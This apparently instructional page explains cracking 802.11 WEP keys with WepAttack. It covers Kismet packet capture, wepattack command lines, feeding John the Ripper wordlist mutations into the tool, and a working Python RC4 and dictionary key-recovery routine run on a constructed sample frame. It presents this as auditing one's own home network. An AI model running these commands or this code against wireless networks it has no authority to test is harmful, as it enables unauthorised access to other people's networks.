WepAttack Main:
Project homepage: http://wepattack.sourceforge.net/
"WepAttack is a WLAN open source Linux tool for
breaking 802.11 WEP keys. This tool is based on an active dictionary attack that
tests millions of words to find the right key. Only one packet is required
to start an attack." -wepattack.sourceforge.net
WepAttack is one of the quickest ways of breaking into a WEP-enabled WLAN
whose key is a dictionary word. We see regular WepAttack audits as essential on home
WLANs (businesses should be using something stronger than WEP!), akin to performing
regular L0phtCrack password audits.
Installing WepAttack
Capturing Encrypted Packets:
Before we can attempt to break a WEP key with WepAttack's
dictionary attack we first need to capture one encrypted packet.
The easiest way to do this is with
Kismet (any tool that generates dump files in pcap format can be used, e.g. tcpdump or
Ethereal), assuming you have installed Kismet as per our
instructions, as follows:
kismet
Use 's' to sort the networks and 'f' to sort by
first time seen
Use 'L' to lock kismet to the channel of the desired
network
Now we simply wait until we have captured an encrypted packet or
packets. The Info window on the right-hand side of the Kismet
display and its Cryptd counter will indicate when we have the necessary
packet (see below).

NOTE: We have captured 44 encrypted
packets, but only 1 is required.
Now that we have our encrypted packets, exit from Kismet with 'Q'.
My Kismet dump is then auto-saved to /tmp/Kismet-Dec-01-2005-3.dump (the filename will obviously
vary).
Using WepAttack:
usage: wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]

Now we process the Kismet dump file with WepAttack against our
specified wordlist (-m 128 selects 128-bit WEP, i.e. 13-byte keys; use -m 64 for 5-byte keys):
cd /tools/wifi/WepAttack-0.1.3/src
wepattack -f /tmp/Kismet-Dec-01-2005-3.dump -w wordlist -m 128
*This will attempt to crack every network in the dump; to target a single network use the -n switch.

Results are written to WepAttack-[current_date].log.
If the network's key is a word contained in the wordlist you are using, WepAttack will
report the WEP key. A key that is not in the list (for example a randomly generated hex key)
will not be found by this method, however long the wordlist.
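The reason a single captured packet is enough is that every WEP frame carries a 4-byte CRC-32 (the ICV) inside the encrypted payload, so a candidate key can be verified offline by decrypting and recomputing the checksum. The following Python is an added example written for this page, not WepAttack's own code: it builds one constructed WEP frame body under a weak 13-byte key, then runs the same dictionary check WepAttack performs (try each word of the right length as the raw key, RC4-decrypt with IV||key, compare the ICV). The sample key, IV, payload and wordlist are all made up for the demonstration.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP uses it as-is, with no key-byte dropping."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_index: int = 0) -> bytes:
    """Encrypted body of a WEP data frame: IV(3) | KeyID(1) | RC4(IV||key, plaintext || ICV).

    The ICV is CRC-32 over the plaintext, little-endian, as in 802.11 WEP.
    """
    assert len(iv) == 3 and len(key) in (5, 13)
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + bytes([key_index << 6]) + rc4(iv + key, plaintext + icv)


def wep_try_key(key: bytes, body: bytes) -> bool:
    """True if `key` decrypts `body` to data whose ICV matches.

    The ICV alone gives a false positive once in 2^32 tries, so we also require the
    LLC/SNAP header (AA AA 03) that starts every encapsulated 802.11 data payload.
    """
    iv, ct = body[:3], body[4:]          # skip the KeyID byte at offset 3
    pt = rc4(iv + key, ct)
    data, icv = pt[:-4], pt[-4:]
    icv_ok = struct.unpack("<I", icv)[0] == (zlib.crc32(data) & 0xFFFFFFFF)
    return icv_ok and data[:3] == b"\xaa\xaa\x03"


def dictionary_attack(body: bytes, wordlist, mode: int = 128):
    """WepAttack-style attack: each word of the right length is tried as the raw ASCII key.

    mode 64 -> 5-byte keys, mode 128 -> 13-byte keys (the secret part of a 128-bit WEP key).
    `wordlist` may be any iterable of str or bytes, e.g. lines piped in from john --stdout.
    """
    key_len = {64: 5, 128: 13}[mode]
    for word in wordlist:
        cand = word.encode("latin-1", "ignore") if isinstance(word, str) else word
        cand = cand.rstrip(b"\r\n")
        if len(cand) != key_len:
            continue                      # cheap filter: wrong length can never be the key
        if wep_try_key(cand, body):
            return cand
    return None


# Constructed sample traffic (not a real capture): an ARP request behind an LLC/SNAP
# header, encrypted under a dictionary-word key that a 13-byte wordlist entry matches.
SAMPLE_KEY = b"secret1234567"
SAMPLE_IV = b"\x01\x02\x03"
SAMPLE_PAYLOAD = (b"\xaa\xaa\x03\x00\x00\x00\x08\x06"     # LLC/SNAP, ethertype ARP
                  + b"\x00\x01\x08\x00\x06\x04\x00\x01"  # ARP header, opcode request
                  + bytes(20))                           # sender/target hw+ip fields
SAMPLE_BODY = wep_encrypt(SAMPLE_KEY, SAMPLE_IV, SAMPLE_PAYLOAD)
SAMPLE_WORDLIST = ["password", "wireless12345", "secret1234567\n", "admin"]

if __name__ == "__main__":
    print("recovered key:", dictionary_attack(SAMPLE_BODY, SAMPLE_WORDLIST))
```

Because the check is entirely offline, throughput is bounded only by RC4 setup per candidate; the length filter is what makes a multi-million-word list practical, since most entries are discarded without any decryption.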

Using JtR with WepAttack:
John the Ripper (JtR) is a very efficient password cracker.
JtR is able to take a word from a dictionary file and generate different
variations of the same word, e.g. world would be expanded to World, w0rld, world1,
etc.
To feed JtR's output into WepAttack we pipe the mangled words to it on stdin:
./john --wordlist=wordlist --rules --stdout | wepattack -f /tmp/Kismet-Dec-01-2005-3.dump
Using JtR to generate variations on the default wordlist expands
the dictionary attack from 3,290,000 words to well in excess of 15,500,000
words!